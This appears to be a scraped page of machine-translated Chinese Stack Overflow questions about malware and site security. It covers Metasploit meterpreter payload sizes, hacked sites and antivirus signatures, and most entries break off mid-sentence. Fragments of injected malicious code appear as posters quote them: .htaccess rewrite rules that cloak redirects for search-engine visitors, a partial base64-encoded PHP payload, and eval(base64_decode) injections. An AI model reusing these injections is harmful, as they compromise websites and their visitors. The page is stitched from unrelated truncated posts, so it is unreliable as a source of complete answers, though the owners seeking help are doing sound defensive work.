你能想出一种机制来保证我的软件(GUI应用程序)是我当前正在运行的软件，而不是冒名顶替者(作为黑盒)。这听起来是个疯狂的要求，但这个软件决定了生命(它是一个医疗设备)，如果有人坚持做坏事，他可以创建一个类似的软件，并确保以某种方式用他的版本替换正版。任何硬件/软件选项对我都有效。我的目标是Windows和Java语言。如果需要与另一软件/硬件相辅相成，使其协同工作，这当然是可行的。BR,奥伦 最佳答案 最好的办法是为此遵循标准程序。简而言之，您可以执行以下操作。在你的机器上:将代码放入jar文件中使用私钥对jar文件进行数字签名将您

我一直在Metasploit上生成有效载荷，我一直在试验不同的模板和一个模板，您可以像exe-small一样拥有有效载荷。我生成的有效负载类型是windows/meterpreter/reverse_tcp并且仅使用普通的exe模板，它的文件大小约为72KB，但是exe-small输出大小为2.4kb的有效载荷。为什么是这样？我如何将其应用到我的编程中？ 最佳答案 尽可能小PE文件只有97个字节-它什么也不做(只是返回)。目前最小的可运行可执行文件是133字节，因为Windows需要加载kernel32。无法执行没有导入的PE文件。

Godaddy将我的/html/.htaccess文件标记为可能的恶意软件。这是恶意的吗？Fwiw，它还将wp-currentver.php标记为可能的恶意软件。我的网站看起来很好，似乎运行良好。RewriteEngineOnRewriteCond%{ENV:REDIRECT_STATUS}200RewriteRule^-[L]RewriteCond%{HTTP_USER_AGENT}(google|yahoo|msn|aol|bing)[OR]RewriteCond%{HTTP_REFERER}(google|yahoo|msn|aol|bing)RewriteRule^([^/]*

今年2月14日，我的网站受到了一些恶意代码的攻击，这是在2月29日谷歌采取行动后我注意到的，但是所有php文件都受到了恶意代码的影响，我得到了以下代码echobase64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIC

我有一个网站会自动在联系我​​们页面和其他3个页面下添加隐藏链接。我删除了所有恶意软件代码，但它仍在该页面上重命名，我还检查了数据库，但没有迹象表明找不到任何签名。这是页面上出现的链接buycheapcialiswithoutaprescriptionclickherebuyviagrainukwheretobuyviagrausbuycialisjellyonlinehowtobuycialisonlinecialis20mgbuysildenafilonlinebuyviagraCanadaviagraonlineherebuyzithromaxonlinecheapzithrom

所以我不久前被黑了，现在我的文件管理器中有一个奇怪的PHP文件。这是它的内容:当然，我删除了它。但是它做了什么？是否有更多文件被感染？我知道它正在检查系统是32位系统还是64位系统，然后它创建1.sh并执行它，但是然后呢？完整代码:http://pastebin.com/hejkuQtV 最佳答案 我试着分析代码。看看这个并检查我对shell脚本“1.sh”的评论。在我看来，删除PHP脚本是不够的。这里有更多信息。首先，我们可以使用这段代码生成“.so”文件。//runphphack.php>jquery.so此时，我们拥有攻击者在

关闭。这个问题需要debuggingdetails.它目前不接受答案。编辑问题以包含desiredbehavior,aspecificproblemorerror,andtheshortestcodenecessarytoreproducetheproblem.这将有助于其他人回答问题。关闭8年前。Improvethisquestion我最近创建了一个网站，如果我在chrome中打开它，它会给我一个恶意软件保护错误，如果我在ff或ie中打开它，它会给我安装Java插件，但我没有添加任何javaapplet主页而不是主页上的任何恶意软件或特洛伊木马为什么它显示给我......请告诉我如何

一如既往，我想提前对您提供的所有帮助和意见表示感谢。我有一个特定的网站，我是该网站的Web开发人员，但遇到了一个独特的问题。似乎有某种东西以某种方式进入了我网站上的每个PHP文件并添加了一些恶意代码。我已经多次从每个页面删除代码并更改FTP和DB密码，但无济于事。添加的代码如下所示-eval(base64_decode(string))-string为3024个字符。不确定是否有其他人遇到过这个问题，或者是否有人对如何保护我的php代码有任何想法。再次感谢。 最佳答案 服务器本身可能会受到损害。向您的虚拟主机报告问题。他们的reac

我网站上的一些聚合页面有时会被chrome屏蔽，因为它们“包含”恶意软件网站。（“如果继续，谷歌发现恶意软件可能安装在您的计算机上。”等）有没有一个恶意软件网站的名单，我可以用来黑名单至少其中一些内容和方法，以保持它的最新？ 最佳答案 是的，您可以使用google安全浏览api来检查链接：https://developers.google.com/safe-browsing/ 关于seo-恶意软件域列表[已关闭]，我们在StackOverflow上找到一个类似的问题：

假设我创建了一个文件压缩库，这个库被用于1000个(非恶意)程序。但是现在恶意软件开发人员决定创建一个恶意软件并使用我的库来压缩一些文件。根据我对杀毒软件工作原理的了解，它从恶意软件中选择一组字节串并将其存储在数据库中。现在，当防病毒软件扫描具有这些字节串的程序时，它会警告用户这是恶意软件。但是，如果防病毒软件选择了一个与我的库代​​码的一部分相对应的字节串，这是否意味着我的库现在被检测为恶意软件(因此1000个非恶意程序现在被检测为恶意软件)？ 最佳答案 有两种检测恶意软件的技术，第一种是通过文件签名，例如卡巴斯基每天都会收到大量